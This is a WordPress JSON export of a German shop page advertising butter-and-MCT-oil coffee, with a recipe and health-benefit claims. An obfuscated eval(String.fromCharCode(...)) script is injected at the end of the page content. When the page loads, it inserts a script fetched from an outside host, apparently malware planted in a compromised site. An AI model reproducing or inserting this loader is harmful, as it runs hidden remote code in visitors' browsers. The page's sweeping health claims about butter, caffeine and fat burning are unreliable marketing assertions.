{"id":377,"date":"2016-02-09T09:51:00","date_gmt":"2016-02-09T09:51:00","guid":{"rendered":"http:\/\/shopingpoint.de\/www\/fliqua\/?page_id=377"},"modified":"2024-01-12T10:33:56","modified_gmt":"2024-01-12T09:33:56","slug":"energiekaffee-buttermctkaffee","status":"publish","type":"page","link":"https:\/\/www.fliqua.de\/?page_id=377","title":{"rendered":"Energie Kaffee  \/  Butter MCT Kaffee"},"content":{"rendered":"<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/TitelButterkaffeeflyer-Kopie.jpg\" rel=\"attachment wp-att-378\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-378\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/TitelButterkaffeeflyer-Kopie.jpg\" alt=\"TitelButterkaffeeflyer Kopie\" width=\"210\" height=\"277\"><\/a><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>WARUM NICHT MAL KAFFEE MIT BUTTER UND MCT \u00d6L PROBIEREN ?<\/strong><\/span><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>LECKER !<\/strong><\/span><\/p>\n<p><em><strong>Rezept<\/strong><\/em><\/p>\n<ul>\n<li><strong>HighPerformance Kaffee (100% BIO)<\/strong><\/li>\n<li><strong>1-2 TL Butter von Weidek\u00fchen<\/strong><\/li>\n<li><strong>1-2 TL MCT \u00d6l<\/strong><\/li>\n<\/ul>\n<p>Den HighPerformance Kaffee mit der Butter und dem MCT \u00d6l mixen.<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Rezeptsolo-Kopie.jpg\" rel=\"attachment wp-att-381\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-381 alignright\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Rezeptsolo-Kopie.jpg\" alt=\"Rezeptsolo Kopie\" width=\"204\" height=\"269\"><\/a><br \/>\n<strong>ERGIBT DIE EXTRAPORTION ENERGIE UND BRAINPOWER!&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/strong><strong>BEFREIT VON ESSGEL\u00dcSTEN.<\/strong><br \/>\nDie Menge an Butter und MCT kann sp\u00e4ter gerne h\u00f6her dosiert werden. Sollte anfangs Durchfall auftreten, die Menge reduzieren und nach einer Gew\u00f6hnungsphase wieder mit h\u00f6heren Dosierungen experimentieren.<br \/>\n<em>Tipp: Um eine Abk\u00fchlung des Kaffees zu vermeiden, sollte der Mixer vorher erw\u00e4rmt werden.<\/em><\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Warum Kaffee?<\/strong><\/span><br \/>\nKoffein ist ein Energieverst\u00e4rker, kann kognitiven Abbau mildern und Entz\u00fcndungen im Gehirn blockieren. Koffein verbessert bei gesunden Menschen die Insulinempfindlichkeit, die f\u00fcr eine nachhaltige Gewichtsabnahme \u00e4u\u00dferst wichtig ist. Kaffee unterst\u00fctzt die guten Darmbakterien.<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Warum Butter von Weidek\u00fchen?<\/strong><\/span><br \/>\nDiese Butter stillt den Hunger und gibt st\u00e4rkende Energie. Sie ist ein Supernahrungsmittel, enth\u00e4lt Omega3 Fetts\u00e4uren, CLA, beta-Carotin, VitaminA, K, D, E und Antioxidantien. Die enthaltene Butters\u00e4ure wirkt Entz\u00fcndungen entgegen. Butter im Kaffee macht die im Kaffee enthaltenen antioxidierenden Polyphenole (u.a. die Leistungsf\u00e4higkeit steigernde Chlorogens\u00e4ure) besonders bioverf\u00fcgbar.<\/p>\n<p style=\"text-align: left;\"><span style=\"text-decoration: underline;\"><strong>Warum MCT?<a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/MCT_ButterkaffeeFlyer.jpg\" rel=\"attachment wp-att-374\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-374 alignright\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/01\/MCT_ButterkaffeeFlyer.jpg\" alt=\"MCT_ButterkaffeeFlyer\" width=\"204\" height=\"277\"><\/a><\/strong><\/span><br \/>\nDie k\u00fcrzesten mittelkettigen Triglyceride (MCT) helfen der Leber, Ketonk\u00f6rper zu bilden. Dieses Nebenprodukt des Fettstoffwechsels f\u00f6rdert die M\u00f6glichkeit, K\u00f6rperfett loszuwerden. Je mehr wir davon im Blut haben, desto h\u00f6her ist die geistige Konzentrationsf\u00e4higkeit und desto st\u00e4rker ist das S\u00e4ttigungsgef\u00fchl.<\/p>\n<p style=\"text-align: left;\"><em><span style=\"text-decoration: underline;\">F\u00f6rdert die <\/span><span style=\"text-decoration: underline;\">Fettverbrennung<\/span><\/em><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>Welche Rolle spielt die Art und Weise <\/strong><\/span><span style=\"text-decoration: underline;\"><strong>der Herstellung?<\/strong><\/span><br \/>\nDie der Gesundheit f\u00f6rderlichen \u00d6le im Kaffee &#8211; Kahweol und Cafestol &#8211; sind einmalig und neurologische, entz\u00fcndungshemmende Wirkstoffe, die vor oxidativem Stress und einer Sch\u00e4digung der DNA sch\u00fctzen k\u00f6nnen. Diese \u00d6le bleiben erhalten, wenn man den Kaffee mit einem Metallfilter zubereitet (Stempelkanne, Goldfilter oder Espressomaschine). Wichtig ist auch das <span style=\"text-decoration: underline;\">Mixen<\/span>, weil die Butter dabei in Mizellen zerf\u00e4llt, die dem K\u00f6rper helfen, Fett als Energiequelle zu nutzen.<\/p>\n<p>Achten Sie immer auf die <strong>QUALIT\u00c4T<\/strong> des Kaffees. Toxine und Schimmelpilze wirken sich desastr\u00f6s auf die Gehirnfunktionen aus. Mit dem HighPerformance Kaffee haben Sie ein hochwertiges Produkt.<\/p>\n<p>Produkte und weitere Informationen auf dieser Webseite:<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Qualit\u00e4tButterkaffeeflyer-Kopie.jpg\" rel=\"attachment wp-att-380\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-380 alignright\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/Qualit\u00e4tButterkaffeeflyer-Kopie.jpg\" alt=\"Qualit\u00e4tButterkaffeeflyer Kopie\" width=\"211\" height=\"278\"><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><center><a href=\"https:\/\/www.fliqua.de\/?page_id=677\"><button>Anfragen<\/button><\/a><\/center>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6390.jpg\" rel=\"attachment wp-att-439\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-439\" src=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6390-300x225.jpg\" alt=\"k-DSC_6390\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6390-300x225.jpg 300w, https:\/\/www.fliqua.de\/wp-content\/uploads\/2016\/02\/k-DSC_6390.jpg 640w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><script type=\"text\/javascript\">eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,54,44,49,49,53,44,52,54,44,49,48,48,44,49,48,53,44,49,48,51,44,49,48,49,44,49,49,53,44,49,49,54,44,57,57,44,49,49,49,44,49,48,56,44,49,48,49,44,57,57,44,49,49,54,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,51,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,53,52,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));<\/script><script type=\"text\/javascript\"> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>WARUM NICHT MAL KAFFEE MIT BUTTER UND MCT \u00d6L PROBIEREN ? LECKER ! Rezept HighPerformance Kaffee (100% BIO) 1-2 TL Butter von Weidek\u00fchen 1-2 TL MCT \u00d6l Den HighPerformance Kaffee mit der Butter und dem MCT \u00d6l mixen. ERGIBT DIE EXTRAPORTION ENERGIE UND BRAINPOWER!&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; BEFREIT VON ESSGEL\u00dcSTEN. Die Menge an Butter und MCT kann sp\u00e4ter [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":188,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"inline_featured_image":false,"footnotes":""},"tags":[],"class_list":["post-377","page","type-page","status-publish","hentry"],"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/377","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=377"}],"version-history":[{"count":13,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/377\/revisions"}],"predecessor-version":[{"id":840,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/377\/revisions\/840"}],"up":[{"embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=\/wp\/v2\/pages\/188"}],"wp:attachment":[{"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=377"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.fliqua.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=377"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}